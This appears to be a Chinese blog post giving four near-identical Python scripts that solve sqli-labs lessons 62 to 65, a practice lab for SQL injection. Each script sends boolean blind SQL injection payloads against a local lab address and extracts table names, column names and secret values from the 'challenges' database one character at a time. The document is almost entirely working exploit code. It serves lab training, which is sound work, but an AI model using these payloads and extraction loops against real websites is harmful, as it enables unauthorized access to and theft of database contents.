前言
运行前需要安装 requests 和 lxml 包，修改 url 和 referer 的参数值，把 index.php 中的 $times 改为 13000，并重置一下 challenges 数据库。
Less-62
import requests
from lxml import etree
"""
Less-62布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-62/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-62/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58))
request_times = 0
alltb_payload = """') or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """') or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload, *params):
    """Recover one string value character by character through the blind oracle.

    `payload` is a format template; `params` fill its leading placeholders
    and the final two are filled with the 1-based character position and a
    candidate ASCII code taken from `list_range`. Every candidate costs one
    GET to `url`; a response whose parsed HTML contains the
    `<font color='#00FFFF'>` hint means the guess was right and the search
    moves to the next position. Extraction stops at the first position
    where no candidate matches, so characters outside `list_range` end the
    result early.

    Returns the recovered string (possibly empty). Side effect: increments
    the module-level `request_times` counter once per request sent. No
    guard exists for an empty or non-HTML response body — confirm the lab
    always answers with a page.
    """
    global request_times
    recovered = []
    position = 1
    while True:
        matched = None
        for code in list_range:
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers)
            request_times += 1
            document = etree.HTML(response.text)
            hint = document.xpath("//font[@color='#00FFFF']/text()")
            if hint:
                matched = chr(code)
                break
        if matched is None:
            # No candidate fit this position: the value is complete.
            return "".join(recovered)
        recovered.append(matched)
        position += 1
def main():
    """Run the three extraction stages against the `challenges` schema and print each result.

    Stage order: table names of the schema, then column names of that
    table, then the values of the third column. `all_col.split(',')[2]`
    requires at least three comma-separated column names and raises
    IndexError otherwise. `sel_tb` is the whole comma-joined table list
    returned by `same`, so this presumably relies on the schema holding a
    single table — verify against the lab database. Ends by printing the
    total number of requests sent.
    """
    sel_db = 'challenges'
    separator = '-' * 100

    all_tb = same(alltb_payload, sel_db)
    print(f"{sel_db}库里的表:{all_tb}")
    print(separator)

    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(f"{sel_tb}表里的字段:{all_col}")
    print(separator)

    sel_col = all_col.split(',')[2]
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(f"{sel_col}的值:{all_values}")
    print(separator)

    print(f"一共请求了{request_times}次")
if __name__ == "__main__":
    # Only start sending requests when run as a script, never on import.
    main()
Less-63
import requests
from lxml import etree
"""
Less-63布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-63/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-63/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58))
request_times = 0
alltb_payload = """' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """' or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """' or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload, *params):
    """Recover one string value character by character through the blind oracle.

    `payload` is a format template; `params` fill its leading placeholders
    and the final two are filled with the 1-based character position and a
    candidate ASCII code taken from `list_range`. Every candidate costs one
    GET to `url`; a response whose parsed HTML contains the
    `<font color='#00FFFF'>` hint means the guess was right and the search
    moves to the next position. Extraction stops at the first position
    where no candidate matches, so characters outside `list_range` end the
    result early.

    Returns the recovered string (possibly empty). Side effect: increments
    the module-level `request_times` counter once per request sent. No
    guard exists for an empty or non-HTML response body — confirm the lab
    always answers with a page.
    """
    global request_times
    recovered = []
    position = 1
    while True:
        matched = None
        for code in list_range:
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers)
            request_times += 1
            document = etree.HTML(response.text)
            hint = document.xpath("//font[@color='#00FFFF']/text()")
            if hint:
                matched = chr(code)
                break
        if matched is None:
            # No candidate fit this position: the value is complete.
            return "".join(recovered)
        recovered.append(matched)
        position += 1
def main():
    """Run the three extraction stages against the `challenges` schema and print each result.

    Stage order: table names of the schema, then column names of that
    table, then the values of the third column. `all_col.split(',')[2]`
    requires at least three comma-separated column names and raises
    IndexError otherwise. `sel_tb` is the whole comma-joined table list
    returned by `same`, so this presumably relies on the schema holding a
    single table — verify against the lab database. Ends by printing the
    total number of requests sent.
    """
    sel_db = 'challenges'
    separator = '-' * 100

    all_tb = same(alltb_payload, sel_db)
    print(f"{sel_db}库里的表:{all_tb}")
    print(separator)

    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(f"{sel_tb}表里的字段:{all_col}")
    print(separator)

    sel_col = all_col.split(',')[2]
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(f"{sel_col}的值:{all_values}")
    print(separator)

    print(f"一共请求了{request_times}次")
if __name__ == "__main__":
    # Only start sending requests when run as a script, never on import.
    main()
Less-64
import requests
from lxml import etree
"""
Less-64布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-64/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-64/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58))
request_times = 0
alltb_payload = """1)) and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1)) and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1)) and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload, *params):
    """Recover one string value character by character through the blind oracle.

    `payload` is a format template; `params` fill its leading placeholders
    and the final two are filled with the 1-based character position and a
    candidate ASCII code taken from `list_range`. Every candidate costs one
    GET to `url`; a response whose parsed HTML contains the
    `<font color='#00FFFF'>` hint means the guess was right and the search
    moves to the next position. Extraction stops at the first position
    where no candidate matches, so characters outside `list_range` end the
    result early.

    Returns the recovered string (possibly empty). Side effect: increments
    the module-level `request_times` counter once per request sent. No
    guard exists for an empty or non-HTML response body — confirm the lab
    always answers with a page.
    """
    global request_times
    recovered = []
    position = 1
    while True:
        matched = None
        for code in list_range:
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers)
            request_times += 1
            document = etree.HTML(response.text)
            hint = document.xpath("//font[@color='#00FFFF']/text()")
            if hint:
                matched = chr(code)
                break
        if matched is None:
            # No candidate fit this position: the value is complete.
            return "".join(recovered)
        recovered.append(matched)
        position += 1
def main():
    """Run the three extraction stages against the `challenges` schema and print each result.

    Stage order: table names of the schema, then column names of that
    table, then the values of the third column. `all_col.split(',')[2]`
    requires at least three comma-separated column names and raises
    IndexError otherwise. `sel_tb` is the whole comma-joined table list
    returned by `same`, so this presumably relies on the schema holding a
    single table — verify against the lab database. Ends by printing the
    total number of requests sent.
    """
    sel_db = 'challenges'
    separator = '-' * 100

    all_tb = same(alltb_payload, sel_db)
    print(f"{sel_db}库里的表:{all_tb}")
    print(separator)

    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(f"{sel_tb}表里的字段:{all_col}")
    print(separator)

    sel_col = all_col.split(',')[2]
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(f"{sel_col}的值:{all_values}")
    print(separator)

    print(f"一共请求了{request_times}次")
if __name__ == "__main__":
    # Only start sending requests when run as a script, never on import.
    main()
Less-65
import requests
from lxml import etree
"""
Less-65布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""
url = 'http://192.168.31.242/sqli-labs/Less-65/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-65/',
'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58))
request_times = 0
alltb_payload = """1") and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1") and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1") and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""
def same(payload, *params):
    """Recover one string value character by character through the blind oracle.

    `payload` is a format template; `params` fill its leading placeholders
    and the final two are filled with the 1-based character position and a
    candidate ASCII code taken from `list_range`. Every candidate costs one
    GET to `url`; a response whose parsed HTML contains the
    `<font color='#00FFFF'>` hint means the guess was right and the search
    moves to the next position. Extraction stops at the first position
    where no candidate matches, so characters outside `list_range` end the
    result early.

    Returns the recovered string (possibly empty). Side effect: increments
    the module-level `request_times` counter once per request sent. No
    guard exists for an empty or non-HTML response body — confirm the lab
    always answers with a page.
    """
    global request_times
    recovered = []
    position = 1
    while True:
        matched = None
        for code in list_range:
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers)
            request_times += 1
            document = etree.HTML(response.text)
            hint = document.xpath("//font[@color='#00FFFF']/text()")
            if hint:
                matched = chr(code)
                break
        if matched is None:
            # No candidate fit this position: the value is complete.
            return "".join(recovered)
        recovered.append(matched)
        position += 1
def main():
    """Run the three extraction stages against the `challenges` schema and print each result.

    Stage order: table names of the schema, then column names of that
    table, then the values of the third column. `all_col.split(',')[2]`
    requires at least three comma-separated column names and raises
    IndexError otherwise. `sel_tb` is the whole comma-joined table list
    returned by `same`, so this presumably relies on the schema holding a
    single table — verify against the lab database. Ends by printing the
    total number of requests sent.
    """
    sel_db = 'challenges'
    separator = '-' * 100

    all_tb = same(alltb_payload, sel_db)
    print(f"{sel_db}库里的表:{all_tb}")
    print(separator)

    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(f"{sel_tb}表里的字段:{all_col}")
    print(separator)

    sel_col = all_col.split(',')[2]
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(f"{sel_col}的值:{all_values}")
    print(separator)

    print(f"一共请求了{request_times}次")
if __name__ == "__main__":
    # Only start sending requests when run as a script, never on import.
    main()